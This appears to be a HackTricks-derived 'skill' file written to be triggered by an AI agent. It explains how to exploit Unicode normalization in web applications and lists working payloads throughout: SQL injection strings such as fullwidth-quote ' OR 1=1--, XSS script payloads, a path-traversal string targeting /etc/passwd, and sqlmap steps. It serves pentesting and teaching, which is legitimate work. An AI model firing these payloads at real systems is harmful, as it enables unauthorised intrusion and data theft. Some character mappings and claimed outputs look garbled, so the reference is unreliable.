Hacktricks-skills unicode-normalization-pentest

How to identify and exploit Unicode normalization vulnerabilities in web applications. Use this skill whenever you're testing for SQL injection bypass, XSS, WAF evasion, or input validation issues that might be affected by Unicode normalization. Trigger this when you see reflected input, need to bypass character filters, or want to test for normalization-based security flaws. Don't forget to use this for any input validation testing, especially when the application echoes user input or uses regex-based filtering.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/unicode-injection/unicode-normalization/SKILL.MD
source content

Unicode Normalization Pentesting

This skill helps you identify and exploit Unicode normalization vulnerabilities in web applications. These vulnerabilities occur when applications normalize Unicode input at different stages of processing, potentially bypassing security filters.

Quick Detection Test

Start with the Kelvin Sign test to detect if normalization is happening:

  1. Send
    KELVIN SIGN
    (U+0212A) encoded as
    %e2%84%aa
    to any input field
  2. If the application echoes back a plain
    K
    , Unicode normalization is being performed
  3. This indicates potential for normalization-based bypass attacks

Understanding the Vulnerability

How It Works

Applications may normalize Unicode input at different processing stages:

  • Before filtering: Normalization happens first, then security filters run
  • After filtering: Filters run first, then normalization creates new characters
  • Inconsistent normalization: Different parts of the app use different algorithms

The Four Normalization Forms

FormDescriptionUse Case
NFCCanonical compositionMost common default
NFDCanonical decompositionBreaks characters into base + combining
NFKCCompatibility compositionConverts compatibility characters
NFKDCompatibility decompositionFull compatibility breakdown

Attack Vectors

1. SQL Injection Filter Bypass

When applications filter dangerous characters but normalize afterward:

Target: Single quote

'
(0x27)

  • Unicode equivalent:
    %ef%bc%87
    (FULLWIDTH SINGLE QUOTATION MARK)

Payloads:

# Single quote injection
%ef%bc%87+or+1=1--+

# With Unicode equivalents for all characters
%ef%bc%87+%e1%b4%bc%e1%b4%bf+%c2%b9%e2%81%bc%c2%b9%ef%b9%a3%ef%b9%a3+%ef%b9%a3

# Double quote variant
%ef%bc%82+or+1=1--+

# OR operator bypass
%ef%bc%87+%ef%bd%9c%ef%bd%9c+%c2%b9%e2%81%bc%e2%81%bc%c2%b9%ef%bc%8f%ef%bc%8f

Key Unicode Mappings:

'  → %ef%bc%87  (FULLWIDTH SINGLE QUOTATION MARK)
"  → %ef%bc%82  (FULLWIDTH DOUBLE QUOTATION MARK)
|  → %ef%bd%9c  (FULLWIDTH VERTICAL LINE)
/  → %ef%bc%8f  (FULLWIDTH SOLIDUS)
-  → %ef%b9%a3  (FULLWIDTH HYPHEN-MINUS)
=  → %e2%81%bc  (DOUBLE VERTICAL LINE)
1  → %c2%b9     (SUPERSCRIPT ONE)
#  → %ef%b9%9f  (FULLWIDTH NUMBER SIGN)
*  → %ef%b9%a1  (FULLWIDTH ASTERISK)
o  → %e1%b4%bc  (OGAM LETTER ONN)
r  → %e1%b4%bf  (OGAM LETTER RRI)

2. XSS Bypass

Use Unicode characters that normalize to script-breaking characters:

Example payloads:

<script>alert(1)</script>
%e2%89%ae%3Cscript%3Ealert(1)%3C/script%3E
%u226e%3Cscript%3Ealert(1)%3C/script%3E

Special K Polyglot:

%F0%9D%95%83%E2%85%87%F0%9D%99%A4%F0%9D%93%83%E2%85%88%F0%9D%94%B0%F0%9D%94%A5%F0%9D%99%96%F0%9D%93%83
# Normalizes to: Leonishan

3. Regex Fuzzing

When regex validation normalizes input but the actual usage doesn't:

Use recollapse tool:

# Generate variations of input to fuzz backend
pip install recollapse
recollapse "https://example.com/path"

Test for:

  • Open Redirect vulnerabilities
  • SSRF through URL validation bypass
  • Path traversal through normalized characters

4. Unicode Overflow

Exploit byte overflow to create unexpected ASCII characters:

Example: Characters that overflow to

A
(0x41):

  • 0x4e41
    A
  • 0x4f41
    A
  • 0x5041
    A
  • 0x5141
    A

Technique: Send multi-byte sequences where the last byte is your target character.

Testing Workflow

Step 1: Reconnaissance

  1. Identify reflected parameters: Find input fields that echo back to output
  2. Test Kelvin Sign: Send
    %e2%84%aa
    and check for
    K
    in response
  3. Check normalization behavior: Compare responses with different Unicode forms

Step 2: Filter Analysis

  1. Identify blocked characters: Test common dangerous characters (
    '
    ,
    "
    ,
    <
    ,
    >
    , etc.)
  2. Test Unicode equivalents: Replace blocked chars with Unicode variants
  3. Check normalization timing: Determine if normalization happens before or after filtering

Step 3: Exploitation

  1. Craft payloads: Use Unicode equivalents for your attack vectors
  2. Test with sqlmap: Use the Unicode template for automated testing
  3. Manual verification: Confirm the vulnerability works as expected

Step 4: Verification

  1. Confirm bypass: Verify the attack succeeds through normalization
  2. Document findings: Record which Unicode forms work
  3. Test edge cases: Try different normalization forms (NFC, NFD, NFKC, NFKD)

Tools and Resources

sqlmap Unicode Template

# Clone the template
git clone https://github.com/carlospolop/sqlmap_to_unicode_template

# Use with sqlmap
python sqlmap_to_unicode.py -u "http://target.com/page?id=1"

recollapse

# Generate input variations
pip install recollapse
recollapse "input_string"

Reference Tables

Common Scenarios

WAF Bypass

When WAF filters specific characters but normalizes afterward:

# Original blocked payload
' OR 1=1--

# Unicode bypass
%ef%bc%87+%e1%b4%bc%e1%b4%bf+%c2%b9%e2%81%bc%c2%b9%ef%b9%a3%ef%b9%a3+%ef%b9%a3

Input Validation Bypass

When validation checks for specific patterns but normalizes before use:

# Blocked: <script>
# Bypass: %e2%89%ae%3Cscript%3E

Path Traversal

When path validation is bypassed through Unicode:

# Normal: ../../../etc/passwd
# Unicode: %c0%af%c0%af%c0%af%c0%af%c0%af%c0%afetc%c0%afpasswd

Best Practices

  1. Always test normalization: Include Unicode tests in your standard pentest workflow
  2. Document normalization behavior: Record which forms the application uses
  3. Test all input vectors: Forms, URLs, headers, cookies, JSON bodies
  4. Consider encoding layers: URL encoding + Unicode encoding combinations
  5. Check for inconsistent normalization: Different parts of the app may normalize differently

References